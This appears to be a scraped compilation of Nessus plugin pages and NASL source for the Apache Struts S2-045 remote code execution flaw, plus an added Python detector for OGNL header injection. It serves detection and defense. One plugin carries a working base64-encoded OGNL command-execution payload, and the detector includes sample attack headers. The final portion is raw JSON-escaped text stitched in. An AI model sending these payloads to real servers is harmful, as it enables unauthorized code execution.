  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-046");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
Alternatively, apply the workaround referenced in the vendor advisory.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/07");

  script_set_attribute(attribute:"plugin_type", value:"combined");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin");
  script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts");

  exit(0);
}

include("vcf.inc");

app_info = vcf::combined_get_app_info(app:"Apache Struts");

vcf::check_granularity(app_info:app_info, sig_segments:2);

constraints = [
  { "min_version" : "2.3.5", "max_version" : "2.3.31", "fixed_version" : "2.3.32" },
  { "min_version" : "2.5", "max_version" : "2.5.10", "fixed_version" : "2.5.10.1" }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
```

**Nessus Network Monitor plugin 700055: Apache Struts 2 RCE (CVE-2017-5638) (deprecated)**

* Type: NNM passive signature (`700055.PRM`, binary, no source published), CVE-2017-5638, CPE `cpe:/a:apache:struts`
* Published 2017-04-12, modified 2019-03-06 (last seen 2023-05-18)
* Plugin page: [tenable.com/plugins/nnm/700055](<https://www.tenable.com/plugins/nnm/700055>)

The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.
**Nessus plugin 97610: Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)**

* Type: Nessus remote check (`STRUTS_2_5_10_1_RCE.NASL`), CVE-2017-5638, CPE `cpe:/a:apache:struts`
* Published 2017-03-08, modified 2022-04-11 (last seen 2023-07-28)
* Plugin page: [tenable.com/plugins/nessus/97610](<https://www.tenable.com/plugins/nessus/97610>)

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(97610);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2017-5638");
  script_bugtraq_id(96729);
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");

  script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a web application that uses a Java
framework that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Struts running on the remote host is affected by
a remote code execution vulnerability in the Jakarta Multipart parser
due to improper handling of the Content-Type header. An
unauthenticated, remote attacker can exploit this, via a specially
crafted Content-Type header value in the HTTP request, to potentially
execute arbitrary code, subject to the privileges of the web server
user.");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
Alternatively, apply the workaround referenced in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("http.inc");

port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list('/');

# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match3))
    {
      urls = make_list(urls, match3[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}
if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

urls = list_uniq(urls);

vuln = FALSE;

rand_var = rand_str(length:8);
header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data";
headers_1 = make_array("Content-Type", header_payload);

# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV
# vendors.
# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))
exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX";
exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ";
exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w";
exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb";
exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi";
exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t";
exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz";
exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja";
exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG";
exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N";
exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn";
exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL";
exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS";
exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB";
exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv";
exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI";
exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo=";

headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit)));

# Since struts apps could be taking longer
timeout = get_read_timeout() * 2;
if(timeout < 10)
  timeout = 10;
http_set_read_timeout(timeout);

foreach url (urls)
{
  ############################################
  # Method 1
  ############################################
  res = http_send_recv3(
    method : "GET",
    item : url,
    port : port,
    add_headers : headers_1,
    exit_on_fail : TRUE
  );
  if ( ("X-Tenable: "+ rand_var ) >< res[1] )
    vuln = TRUE;
  # Stop after first vulnerable Struts app is found
  if (vuln) break;

  ############################################
  # Method 2
  ############################################

  cmd_pats = make_array();
  cmd_pats['id'] = "uid=[0-9]+.*\sgid=[0-9]+.*";
  cmd_pats['ipconfig'] = "Subnet Mask|Windows IP|IP(v(4|6)?)? Address";

  res = http_send_recv3(
    method : "GET",
    item : url,
    port : port,
    add_headers : headers_2,
    exit_on_fail : TRUE
  );

  if ("Windows IP" >< res[2] || "uid" >< res[2])
  {
    if (pgrep(pattern:cmd_pats['id'], string:res[2]))
    {
      output = strstr(res[2], "uid");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
    else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))
    {
      output = strstr(res[2], "Windows IP");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
  }
}


if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');

security_report_v4(
  port : port,
  severity : SECURITY_HOLE,
  generic : TRUE,
  request : make_list(http_last_sent_request()),
  output : chomp(output)
);
```
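The remote check above probes S2-045 the way most scanners do: an OGNL expression in the Content-Type header, first a harmless one that makes Struts add a marker response header (`X-Tenable` in the plugin), then the base64-packed command payload that runs `id` or `ipconfig`. As an added example (my own code, not Tenable's, Rapid7's or Infection Monkey's), the Python below inspects the three headers the Jakarta parser echoes into its error message, undoes percent-encoding, and pulls the OGNL expression and any `{'cmd','arg',...}` argument list out of it. The samples are constructed: `X-Probe` is a placeholder header name and `RCE_CT` is an abbreviated stand-in for the public command payload, not a working exploit.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Headers the Jakarta Multipart parser copies into an error message that Struts then
# evaluates as OGNL: Content-Type for S2-045; Content-Disposition and Content-Length
# for the S2-046 variant.
WATCHED_HEADERS = ("content-type", "content-disposition", "content-length")

OGNL_START = re.compile(r"[%$]\{")
# Quoted-string array literals are how command lines appear, e.g. {'bash','-c','id'}
OGNL_ARRAY = re.compile(r"\{\s*'[^']*'(?:\s*,\s*'[^']*')*\s*\}")
SENSITIVE = ("ProcessBuilder", "Runtime", "_memberAccess", "DEFAULT_MEMBER_ACCESS",
             "getExcludedClasses", "getExcludedPackageNames", "HttpServletResponse")


def extract_ognl(value: str) -> Optional[str]:
    """Return the first %{...} or ${...} block in a header value, honouring nested braces."""
    m = OGNL_START.search(value)
    if not m:
        return None
    depth = 0
    for i in range(m.start() + 1, len(value)):
        if value[i] == "{":
            depth += 1
        elif value[i] == "}":
            depth -= 1
            if depth == 0:
                return value[m.start():i + 1]
    return value[m.start():]          # unterminated expression: still worth flagging


def ognl_argv_lists(expr: str) -> List[List[str]]:
    """Pull every {'a','b',...} literal out of an expression as an argv list."""
    return [re.findall(r"'([^']*)'", m.group(0)) for m in OGNL_ARRAY.finditer(expr)]


def inspect_headers(headers: Dict[str, str]) -> dict:
    """Classify one request's headers; stops at the first header carrying OGNL."""
    result = {"attack": False, "header": None, "ognl": None, "argv": [], "indicators": []}
    for name, raw in headers.items():
        if name.lower() not in WATCHED_HEADERS:
            continue
        value = unquote(raw)          # attackers sometimes percent-encode the braces
        expr = extract_ognl(value)
        if expr is None:
            continue
        result.update(attack=True, header=name, ognl=expr,
                      argv=ognl_argv_lists(expr),
                      indicators=[s for s in SENSITIVE if s in expr])
        break
    return result


# Constructed samples (not captured traffic). X-Probe is a placeholder header name and
# RCE_CT is an abbreviated stand-in for the public S2-045 command payload.
PROBE_CT = ("%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
            ".addHeader('X-Probe','d3adb33f')}.multipart/form-data")
RCE_CT = ("%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
          ".(#_memberAccess=#dm).(#cmds={'bash','-c','id'})"
          ".(#p=new java.lang.ProcessBuilder(#cmds)).(#p.start())}")
SAMPLES = {
    "upload": {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4"},
    "probe": {"Content-Type": PROBE_CT},
    "rce": {"Content-Type": RCE_CT},
    "encoded": {"Content-Type": "%25%7B(#_='multipart/form-data').(#cmds={'bash','-c','id'})%7D"},
    "disposition": {"Content-Type": "multipart/form-data; boundary=x",
                    "Content-Disposition": "form-data; name=\"f\"; filename=\"%{#cmds={'bash','-c','id'}}\""},
}


def demo() -> Dict[str, dict]:
    """Run the inspector over every sample; returns {label: result}."""
    return {label: inspect_headers(h) for label, h in SAMPLES.items()}


if __name__ == "__main__":
    for label, r in demo().items():
        print(f"{label:12s} attack={r['attack']} header={r['header']} "
              f"argv={r['argv']} indicators={r['indicators']}")
```

The brace matching in `extract_ognl` matters: the real payload nests `{...}` array literals inside the outer `%{...}`, so a pattern that stops at the first `}` would cut the expression off before the ProcessBuilder call. Keep the rule on all three headers (request headers and multipart part headers alike), since the S2-046 variant moves the expression into a part's `filename` rather than the request's Content-Type.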
**Nessus plugin 141576: Selligent Message Studio Struts Code Execution (CVE-2017-5638)**

* Type: Nessus remote check (`SELLIGENT_MESSAGE_STUDIO_RCE.NBIN`, binary, no source published), CVE-2017-5638, CPE `x-cpe:/a:selligent:selligent_message_studio`
* Published 2020-10-20, modified 2023-07-17 (last seen 2023-07-29)
* Plugin page: [tenable.com/plugins/nessus/141576](<https://www.tenable.com/plugins/nessus/141576>)

The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.

**Nessus plugin 99528: Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)**

* Type: Nessus version check (`ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL`), CVE-2016-1181, CVE-2017-3506, CVE-2017-3531, CVE-2017-5638; CPE `cpe:/a:oracle:fusion_middleware`, `cpe:/a:oracle:weblogic_server`
* Published 2017-04-21, modified 2022-04-11 (last seen 2023-07-28)
* Plugin page: [tenable.com/plugins/nessus/99528](<https://www.tenable.com/plugins/nessus/99528>)

The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities:

* A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181)
* An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506)
* A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531)
* A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)

Plugin source (the description block is cut off at this point in the page):

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(99528);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id(
    "CVE-2016-1181",
    "CVE-2017-3506",
    "CVE-2017-3531",
    "CVE-2017-5638"
  );
  script_bugtraq_id(
    91068,
    91787,
    96729,
    97884
  );
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");
  script_xref(name:"TRA", value:"TRA-2017-16");
  script_xref(name:"ZDI", value:"ZDI-16-444");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");

  script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)");

  script_set_attribute(attribute:"synopsis", value:
"An application server installed on the remote host is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Oracle WebLogic Server installed on the remote host is
affected by multiple vulnerabilities :

  - A remote code execution vulnerability exists in the
    Apache Struts component due to improper handling of
    multithreaded access to an ActionForm instance. An
    unauthenticated, remote attacker can exploit this, via a
    specially crafted multipart request, to execute
    arbitrary code or cause a denial of service condition.
    (CVE-2016-1181)

  - An unspecified flaw exists in the Web Services
    subcomponent that allows an unauthenticated, remote
    attacker to modify or delete arbitrary data accessible
    to the server. (CVE-2017-3506)

  - A remote code execution vulnerability exists in the Web
    Container subcomponent due to improper handling of
    reflected PartItem File requests. An unauthenticated,
    remote attacker can exploit this, via a specially
    crafted request, to execute arbitrary code.
    (CVE-2017-3531)

  - A remote code execution vulnerability exists in the
    Apache Struts component in the Jakarta Multipart parser
    due to improper handling of the Content-Type,
    Content-Disposition, and Content-Length headers.
    An unauthenticated, remote attacker can exploit this,
    via a specially crafted header value in the HTTP
    request, to execute arbitrary code.
```
(CVE-2017-5638)\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2228898.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2017-16\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-16-444/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta 
Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170418\";\n fix = \"25388747\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170418\";\n fix = \"25388793\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.0($|[^0-9])\")\n{\n fix_ver = \"12.2.1.0.170418\";\n fix = \"25388847\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170418\";\n fix = \"25388843\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170418\";\n fix = \"25388866\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:35", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10334", "CVE-2017-10336", 
"CVE-2017-10352"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/103935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103935);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2017-10152\",\n \"CVE-2017-10271\",\n \"CVE-2017-10334\",\n \"CVE-2017-10336\",\n \"CVE-2017-10352\"\n );\n script_bugtraq_id(101304, 101351, 101392);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
